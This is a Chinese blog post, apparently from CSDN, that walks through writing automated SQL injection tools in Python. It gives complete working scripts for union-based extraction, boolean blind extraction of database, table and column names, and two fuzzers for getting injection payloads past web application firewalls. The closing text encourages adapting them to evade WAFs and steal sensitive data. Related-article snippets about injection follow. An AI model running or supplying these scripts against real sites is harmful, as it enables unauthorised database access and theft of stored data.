sql如何去除url_如何编写一个SQL注入工具

最新推荐文章于 2022-02-09 10:29:45 发布
最新推荐文章于 2022-02-09 10:29:45 发布
阅读量72 收藏
点赞数
文章标签: sql如何去除url sql盲注如何解决 如何用vbs编写一个游戏 如何防止sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39968128/article/details/111285449
版权

0x01  前言

  一直在思考如何编写一个自动化注入工具,这款工具不用太复杂,但是可以用最简单、最直接的方式来获取数据库信息,根据自定义构造的payload来绕过防护,这样子就可以。

0x02 SQL注入工具

A、联合查询

union select 实现起来最为简单,报错注入的实现方式也基本一致,主要思路:获取所有数据库名--选择数据库--查看这个数据库下所有表---选择表--查询这个表下所有列名。

 代码详情:

#! /usr/bin/env python# _*_  coding:utf-8 _*_import requestsimport urllibimport revalues={}def get(url,values):    data = urllib.urlencode(values)    geturl = url+'?'+data    response = requests.get(geturl)    result=response.content    find_list=re.findall(r"qwe~(.+?)~qwe", result)    if len(find_list)>0:        return find_listdef get_database_name(url):    values['id'] = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA"     name_list=get(url,values)    print 'The databases:'    for i in name_list:        print i+" ",    print "\n"def table_name(url):    database_name=raw_input('please input your database:')    values['id'] = "1  union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema="+"'"+database_name+"'"    name_list=get(url,values)    print 'The table is :'    for i in name_list:        print i+" ",    print "\n"def column_name(url):    table_name=raw_input('please input your table:')    values['id'] = "1   union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name="+"'"+table_name+"'"    name_list=get(url,values)    print 'The column is :'    for i in name_list:        print i+" ",if __name__ == '__main__':    url='http://192.168.106.130/config/sql.php'    get_database_name(url)    table_name(url)    column_name(url)

运行效果:

97cce6409d39902acf510820941b849d.png

 B、盲注

  盲注的脚本,但总感觉代码不过简洁,越简单越好,可以把局部代码直接拿出来用,简单修改payload就可以获取数据,基于布尔盲注,GET,写的一个简单的注入脚本。

主要思路:获取当前数据库名--选择数据库--获取这个数据库有几个表--依次获取每个表的长度--依次获取获取表名--依次获取每个表的长度、列名。

#! /usr/bin/env python# _*_  coding:utf-8 _*_import requestsimport urllibimport timestart_time = time.time()def database_length(url):    values={}    for i in range(1,100):        values['id'] = "1 and (select length(database()))=%s" %i        data = urllib.urlencode(values)        geturl = url+'?'+data        response = requests.get(geturl)        if response.content.find('qwertyasd')>0:            return idef database_name(url):    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'    values={}    databasename= ''    aa = 15    aa = database_length(url)    for i in range(1, aa+1):        for payload in payloads:            values['id'] = "1 and ascii(substring(database(),%s,1))=%s " %(i,ord(payload))            data = urllib.urlencode(values)            geturl = url+'?'+data            response = requests.get(geturl)            if response.content.find('qwertyasd')>0:                databasename += payload    return databasename#print database_name('http://192.168.125.129/config/sql.php')        def table_count(url,database):    values={}    for i in range(1,100):        values['id'] = "1 and (select count(table_name) from information_schema.tables where table_schema="+"'"+database+"')"+"=%s" %i        data = urllib.urlencode(values)        geturl = url+'?'+data        response = requests.get(geturl)        if response.content.find('qwertyasd')>0:            return idef table_length(url,a,database):    values={}     for i in range(1,100):        values['id'] = "1 and (select length(table_name) from information_schema.tables where table_schema="+"'"+database+"'"+" limit %s,1)=%s" %(a,i)        data = urllib.urlencode(values)        geturl = url+'?'+data        response = requests.get(geturl)        if response.content.find('qwertyasd')>0:            return idef table_name(url,database):    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'    values={}    table_name=[]    bb = table_count(url,database)    for i in range(0,bb+1):        user= ''        cc=table_length(url,i,database)        if cc==None:            break        for j in range(0,cc+1):            for payload in payloads:                values['id'] = "1 and ascii(substring((select table_name from information_schema.tables where table_schema="+"'"+database+"'"+" limit %s,1),%s,1))=%s " %(i,j,ord(payload))                data = urllib.urlencode(values)                geturl = url+'?'+data                response = requests.get(geturl)                if response.content.find('qwertyasd')>0:                    user += payload                    #print payload        table_name.append(user)    return table_name    #print table_name('http://192.168.125.129/config/sql.php','test')def column_count(url,table_name):    values={}    for i in range(1,100):        values['id'] = "1 and (select count(column_name) from information_schema.columns where table_name="+"'"+table_name+"'"+")=%s" %i        data = urllib.urlencode(values)        geturl = url+'?'+data        response = requests.get(geturl)        if response.content.find('qwertyasd')>0:            return idef column_length(num,url,table_name):    values={}    for i in range(1,100):        limit = " limit %s,1)=%s" %(num,i)        values['id'] = "1 and (select length(column_name) from information_schema.columns where table_name="+"'"+table_name+"'"+limit        data = urllib.urlencode(values)        geturl = url+'?'+data        response = requests.get(geturl)        if response.content.find('qwertyasd')>0:            return idef column_name(url,table_name):    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'    values={}    column_name=[]    dd=column_count(url,table_name)    for i in range(0,dd+1):        user= ''        bb=column_length(i,url,table_name)        if bb==None:            break        for j in range(0,bb+1):            for payload in payloads:                limit=" limit %s,1),%s,1))=%s" %(i,j,ord(payload))                values['id'] = "1 and ascii(substring((select column_name from information_schema.columns where table_name="+"'"+table_name+"'"+limit                data = urllib.urlencode(values)                geturl = url+'?'+data                response = requests.get(geturl)                if response.content.find('qwertyasd')>0:                    user += payload        column_name.append(user)    return column_name#print column_name('http://192.168.125.129/config/sql.php','admin')if __name__ == '__main__':    url='http://192.168.125.129/config/sql.php'    databasename=database_name(url)    print "The current database:"+databasename        database=raw_input("Please input your databasename: ")    tables=table_name(url,database)    print database+" have the tables:",    print tables    for table in tables:        print table+" have the columns:"        print column_name(url,table)    print 'Use for: %d second' % (time.time() - start_time)

运行效果:

021c72a2da8c7b28e291ca4f50cf99ca.png

0x03 END

  通过编写简单的SQL注入脚本来获取数据,脚本可容易。遇到WAF拦截时,可灵活调整脚本来绕过WAF获取敏感数据。

附:WAF FUZZ的两个小脚本

第一个:先生成一个字典,带入搭建的环境进行FUZZ,针对某些软WAF挺好用的,可FUZZ出不少姿势出来,记得先把CC攻击加入白名单才行哦。

#! /usr/bin/env python# _*_  coding:utf-8 _*_import urllibimport urllib2import requestsvalues={}f = open('mutou.txt','r')for line in f.xreadlines():    line =line.strip()    values['id'] = "1 union/*%s*/select/*%s*/1,user()" %(line,line)    data = urllib.urlencode(values)    url = "http://192.168.125.140/php/config/sql.php"    url = url+'?'+data    try:        response = requests.get(url)        result = response.content        #print result        if result.count('root'):            print line            print url            print "==================================="        else:            pass            #print ".",    except:        print "Error"

第二个:测试环境搭建好,脚本放着跑,看运气啦。

#! /usr/bin/env python# _*_  coding:utf-8 _*_import requestsfuzz_dic1 = ['*/','/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']fuzz_dic2 = ['*/','',' ','/*!']fuzz_dic3 = ['/*!',"%a0","0c","%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0"}url="http://192.168.125.140/php/config/sql.php?id=1"for i in fuzz_dic1:    for j in fuzz_dic2:        for k in fuzz_dic3:            payload="/*!union"+i+j+k+"select*/ 1,user()"            geturl=url+payload            #print geturl            try:                response=requests.get(url=geturl,headers=headers)                result = response.content                #print result                if result.count('root'):                    print geturl                else:                    print ".",            except:                print "Error"

2a8735ee1886fb8393d8a7dc7c48ec6f.png

weixin_39968128
关注
傀儡SQL注入+URL采集器.zip
04-26
URL采集器,可以根据关键词采集,SQL注入器,傻瓜式找注入点,仅供学习使用,不能用于非法用途,大家可以根据需要下载
sql如何去除url_如何在无回显时渗透
weixin_39849254的博客
12-03 206
前言在渗透测试的很多时候,我们可能都得不到数据的回显。由于得不到数据的回显,我们就无法进一步判断我们渗透测试的结果。所以本文告诉大家,在没有回显的时候,我们又该如何测试。1.利用pingping `命令`.dnslog有很多免费的dnslog使用,例如BurpSuite自带的模块——Burp Collaborator client,当然社区版没有这个功能,专业版的BurpSuite才具有...
sql-leecode实战
mm码农的博客
02-09 527
文本函数substring_index
URL详解和渗透之SQL注入
Xiaokeo的博客
12-07 4774
渗透之SQL注入等相关知识整理          WEB注入,就是在网页寻找相应得注点,如在页头、logo、栏目页、超链接等。当找到相应的注点,接下来就是进入数据库判断登录密码等获取对应的权限,想要完场这些,首先要弄懂的是URL链接语法,下面就是HTTP网页的URL的详细介绍: 1. HTTP网页URL链接语法介绍 HTTP简介:        &
SQL-injection-detective.rar_Detective_sql injection_sql 注入_sql注入
09-23
通常,此类工具会有一个命令行界面或图形用户界面,需要输入目标URL数据库连接信息,然后工具会自动执行一系列测试以查找潜在的SQL注入点。 7. 持续安全:除了使用检测工具外,开发者还应持续关注最新的安全实践...
pangolinsdl—sql注入工具
06-20
PangolinsDL就是这样一个工具,它以其简洁的界面和易用性受到了许多用户的青睐。 1. **PangolinsDL概述** PangolinsDL是一款强大的SQL注入检测工具,它可以帮助用户识别和利用SQL注入漏洞。该工具支持多种数据库...
自己动手编写SQL注入漏洞扫描工具
03-25
本篇将探讨如何自己动手编写一个SQL注入漏洞扫描工具,通过分析提供的程序代码,我们可以了解基本的检测原理和技术。 首先,我们需要理解SQL注入的基本概念。当用户提交的数据被直接拼接到SQL查询,而没有进行...
CmsEasy crossall_act.php SQL注入漏洞.md
最新发布
04-08
SQL注入SQL Injection)是一种攻击技术,攻击者通过在Web表单输入或通过修改URL查询字符串来插入恶意的SQL代码,一旦网站应用未进行适当的输入验证或对用户输入的代码进行了错误的处理,攻击者的SQL代码就可能被...
数据库被注入 JS脚本 代码, 清除 方法
jaylongli的专栏
07-07 1259
 这是我看到比较见到的简单方式: update  [table]  set  ziduan=replace(ziduan, , )  转载[dawugui]实例请参考:http://topic.csdn.net/u/20080506/15/55fb7653-999c-4cb2-befb-f95685d1060d.html 数据库被注入攻击  所有文本型字
MSSQL被注入的清除方法
weixin_33924220的博客
07-22 108
又过一年了,又到了写年终总结的时候。回忆起2009年年头服务器被注入时的事情,为了删除被插入的字符串,在当时记下了这样一段SQL代码。 /***********定义要去除的字符,请注意,肯定不止一条,我的服务器就查到许多不同的代码************/ declare @delStr nvarchar(500) set @delStr='<script ...
SQL注入解决方法
weixin_42377401的博客
11-15 757
SQL注入解决方法一、SQL注入说明二、2、SQL注入影响三、3、SQL注入示例四、4、SQL注入解决方法 一、SQL注入说明 应用为了和数据库进行沟通完成必要的管理和存储工作,必须和数据库保留一种接口。目前的数据库一般都是提供api以支持管理,应用使用底层开发语言如Php,Java,asp,Python与这些api进行通讯。对于数据库的操作,目前普遍使用一种SQL语言(Structured Query Language语言,SQL语言的功能包括查询、操纵、定义和控制,是一个综合的、通用的关系数据库语言,
修复SQL注入漏洞 两种方法
cuanli7032的博客
03-16 2444
之前在网上找到一个在线的网站漏洞扫描工具,叫亿思平台,是一个免费的web安全扫描平台。反正免费,就测试自己的一个网站,没想到还真扫描出SQL注入漏洞。但里面没有提供自动修复功能,需要自己动手来修复。经过反复查看论坛资料,还真让我...
WordPress利用SQL命令删除文章URL/摘要/作者/敏感词汇等方法
五车二的博客
05-24 624
因为采集插件里设置了一些关键词加上A标签,确小看了一篇文章可以带上如此多的关键词。导致一篇文章出现了几十个超链接。 如何做到,只删除特定链接而不破坏其他链接。 使用MYSQLSQL命令批量处理。 1.删除wordpress 文章的指定链接。 UPDATE wp_posts SET post_content = REPLACE( post_content,'<a href="https://www.xingkongweb.com/">星空站长网</a>', '星空站长网
通过url后面的参数进行sql注入
李书明(石家庄)的专栏
01-23 8385
通过url后面的参数进行sql注入,也是攻击者经常使用 伎俩,主要是利用了程序员使用了root帐户连接数据库和动态拼接sql指令的弊端。 看下面的例子 如果程序使用以下的代码实现上面的功能,无疑给攻击者开放了大门。 连接数据库:conn.php <?php $mysqli = new mysqli('localhost','root','root','demo'); i...
最最基本的SQL手动url注入方法
Alexz__的博客
09-07 5729
sql注入,说白了本质就是一个应用sql语句构造程序的一个过程,通过在web输入代码使后台认为其是数据便注入源码之,从而达到某些意想不到的结果 手工查找注入点: 1. 1 #正常访问 2. 1' and 1=1; # 是不是跟正常结果一样 3. 1' and 1=2; # 是不是没有结果 4. 1' order by 1,2; # 猜列数 ...
java以及sql动态的去除url指定参数
YiyeLbj的博客
12-05 1129
Java以及mySql语言动态去除url指定参数
5款强力SQL注入检测与攻击工具:BSQLHacker、TheMole等
Sqlmap则是一个强大的自动SQL注入工具,它不仅能识别并利用数据库管理系统后端的指纹,还能深入挖掘数据库信息,如用户、表格、列等,甚至能执行文件操作和远程代码执行,适用于MySQL、PostgreSQLSQLServer等多种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值